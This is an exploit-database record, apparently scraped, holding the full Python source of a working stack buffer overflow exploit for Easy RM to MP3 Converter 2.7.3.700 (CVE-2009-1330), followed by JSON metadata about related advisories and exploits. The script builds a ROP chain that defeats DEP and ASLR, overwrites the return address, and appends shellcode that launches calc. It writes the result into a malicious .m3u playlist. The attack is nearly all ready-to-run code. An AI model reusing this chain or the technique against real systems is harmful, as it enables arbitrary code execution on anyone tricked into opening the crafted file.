Easy RM to MP3 Converter 2.7.3.700 - .m3u Exploit with Universal DEP+ASLR Bypass

{"bulletinFamily": "exploit", "id": "EDB-ID:39933", "cvelist": ["CVE-2009-1330"], "modified": "2016-06-13T00:00:00", "lastseen": "2016-06-13T16:57:18", "edition": 1, "sourceData": "# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass\r\n# Date: 2016-06-12\r\n# Exploit Author: Csaba Fitzl\r\n# Vendor Homepage: N/A\r\n# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe\r\n# Version: 2.7.3.700\r\n# Tested on: Windows 7 x64\r\n# CVE : CVE-2009-1330\r\n\r\nimport struct\r\n\r\ndef create_rop_chain():\r\n\r\n\t# rop chain generated with mona.py - www.corelan.be\r\n\t# added missing parts, and some optimisation by Csaba Fitzl\r\n\trop_gadgets = [\r\n\r\n\t #mov 1000 to EDX - Csaba\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x10025a1c, # XOR EDX,EDX # RETN \r\n\t 0x1002bc3d, # MOV EAX,411 # RETN\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc24, # ADD EAX,80 # POP EBP # RETN\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc41, # ADD EAX,40 # POP EBP # RETN\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t # AT this point EAX = 0x1000\r\n\t 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI\r\n\t 0x41414141, # Filler (compensate)\r\n\t \r\n\t\r\n\t 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] \r\n\t 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]\r\n\t 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]\r\n\t \r\n\t 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] \r\n\t 0x1001b058, # & push esp # ret [MSRMfilter03.dll]\r\n\t 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] \r\n\t 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\r\n\t 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] \r\n\t 0xffffffff, # \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] \r\n\t 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]\r\n\t 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] \r\n\t 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP\r\n\t 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL \r\n\r\n\t]\r\n\treturn ''.join(struct.pack('<I', _) for _ in rop_gadgets)\r\n\r\nbuffersize = 26090\r\n\r\njunk = \"A\" * buffersize\r\n\r\neip = '\\x85\\x22\\x01\\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN\r\n\r\nrop = create_rop_chain()\r\n\r\ncalc = (\r\n\"\\x31\\xD2\\x52\\x68\\x63\\x61\\x6C\\x63\\x89\\xE6\\x52\\x56\\x64\"\r\n\"\\x8B\\x72\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x0C\\xAD\\x8B\\x30\\x8B\"\r\n\"\\x7E\\x18\\x8B\\x5F\\x3C\\x8B\\x5C\\x1F\\x78\\x8B\\x74\\x1F\\x20\"\r\n\"\\x01\\xFE\\x8B\\x4C\\x1F\\x24\\x01\\xF9\\x42\\xAD\\x81\\x3C\\x07\"\r\n\"\\x57\\x69\\x6E\\x45\\x75\\xF5\\x0F\\xB7\\x54\\x51\\xFE\\x8B\\x74\"\r\n\"\\x1F\\x1C\\x01\\xFE\\x03\\x3C\\x96\\xFF\\xD7\")\r\n \r\n\r\nshell = \"\\x90\"*0x10 + calc\r\n\r\nexploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))\r\n\r\nfilename = \"list.m3u\"\r\ntextfile = open(filename , 'w')\r\ntextfile.write(exploit)\r\ntextfile.close()", "published": "2016-06-13T00:00:00", "href": "https://www.exploit-db.com/exploits/39933/", "osvdbidlist": [], "reporter": "Fitzl Csaba", "hash": "0a954293c47a4a5a50c1c2c96189a5459e001e045f43328f90b1db76b357af4d", "title": "Easy RM to MP3 Converter 2.7.3.700 - .m3u Exploit with Universal DEP+ASLR Bypass", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass. CVE-2009-1330. Local exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/39933/"}

{"result": {"cve": [{"id": "CVE-2009-1330", "type": "cve", "title": "CVE-2009-1330", "description": "Stack-based buffer overflow in Easy RM to MP3 Converter allows remote attackers to execute arbitrary code via a long filename in a playlist (.pls) file.", "published": "2009-04-17T10:08:52", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1330", "cvelist": ["CVE-2009-1330"], "lastseen": "2017-04-18T15:52:31"}], "exploitdb": [{"id": "EDB-ID:10619", "type": "exploitdb", "title": "Easy RM to MP3 27.3.700 - Local BoF xp sp2", "description": "Easy RM to MP3 27.3.700 local BOF xp sp2. CVE-2009-1330. Local exploit for windows platform", "published": "2009-12-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/10619/", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-02-01T12:51:22"}, {"id": "EDB-ID:14550", "type": "exploitdb", "title": "Exploit Easy RM to MP3 2.7.3.700 - .m3u & .pls & .smi & .wpl & .wax & .wvx & .ram", "description": "Exploit Easy RM to MP3 2.7.3.700 ( .m3u , .pls , .smi , .wpl , .wax , .wvx , .ram). CVE-2009-1330. Local exploit for windows platform", "published": "2010-08-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/14550/", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-02-01T20:04:51"}, {"id": "EDB-ID:10602", "type": "exploitdb", "title": "Easy RM to MP3 27.3.700 - WinXP SP3", "description": "Easy RM to MP3 27.3.700 WinXP SP3. CVE-2009-1330. Local exploit for windows platform", "published": "2009-12-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/10602/", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-02-01T12:49:50"}, {"id": "EDB-ID:8427", "type": "exploitdb", "title": "Easy RM to MP3 Converter Universal Stack Overflow Exploit", "description": "Easy RM to MP3 Converter Universal Stack Overflow Exploit. CVE-2009-1329,CVE-2009-1330. Local exploit for windows platform", "published": "2009-04-14T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8427/", "cvelist": ["CVE-2009-1329", "CVE-2009-1330"], "lastseen": "2016-02-01T05:30:11"}, {"id": "EDB-ID:8407", "type": "exploitdb", "title": "ASX to MP3 Converter - .M3U Local Stack Overflow PoC", "description": "ASX to MP3 Converter (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330....", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8407/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:27:26"}, {"id": "EDB-ID:8402", "type": "exploitdb", "title": "Mini-stream Ripper - .M3U Local Stack Overflow PoC", "description": "Mini-stream Ripper (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330. D...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8402/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:26:47"}, {"id": "EDB-ID:8403", "type": "exploitdb", "title": "WM Downloader - .M3U Local Stack Overflow PoC", "description": "WM Downloader (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330. Dos ex...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8403/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:26:54"}, {"id": "EDB-ID:8405", "type": "exploitdb", "title": "Mini-stream RM-MP3 Converter - .M3U Local Stack Overflow PoC", "description": "Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-20...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8405/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:27:12"}, {"id": "EDB-ID:8404", "type": "exploitdb", "title": "RM Downloader - .M3U Local Stack Overflow PoC", "description": "RM Downloader (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330. Dos ex...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8404/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:27:03"}], "seebug": [{"id": "SSV-69531", "type": "seebug", "title": "Exploit Easy RM to MP3 2.7.3.700 (. m3u , . pls , . smi , . wpl , . wax , . wvx , . ram)", "description": "Summary: \nMini-stream is a professional audio ripping and format conversion software manufacturer.< br/>Mini-stream Easy RM to MP3 Converter audio conversion software is not handled correctly. pls and. m3u playlist file. If the user is tricked into loading a malicious playlist file, then it could trigger a stack overflow, leading to arbitrary code execution.< br/>\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-69531", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-08-05T20:43:08"}], "packetstorm": [{"id": "PACKETSTORM:137456", "type": "packetstorm", "title": "Easy RM To MP3 Converter 2.7.3.700 Universal DEP + ASLR Bypass", "description": "", "published": "2016-06-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/137456/Easy-RM-To-MP3-Converter-2.7.3.700-Universal-DEP-ASLR-Bypass.html", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-12-05T22:11:46"}], "zdt": [{"id": "1337DAY-ID-25467", "type": "zdt", "title": "Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass Exploit", "description": "Exploit for windows platform in category local exploits", "published": "2016-06-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://0day.today/exploit/description/25467", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-06-14T21:00:04"}], "openvas": [{"id": "OPENVAS:900633", "type": "openvas", "title": "Easy RM to MP3 Converter Buffer Overflow Vulnerability", "description": "This host is installed with Easy RM to MP3 Converter and is\nprone to Buffer Overflow Vulnerability.", "published": "2009-04-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900633", "cvelist": ["CVE-2009-1330"], "lastseen": "2017-01-25T11:02:18"}]}}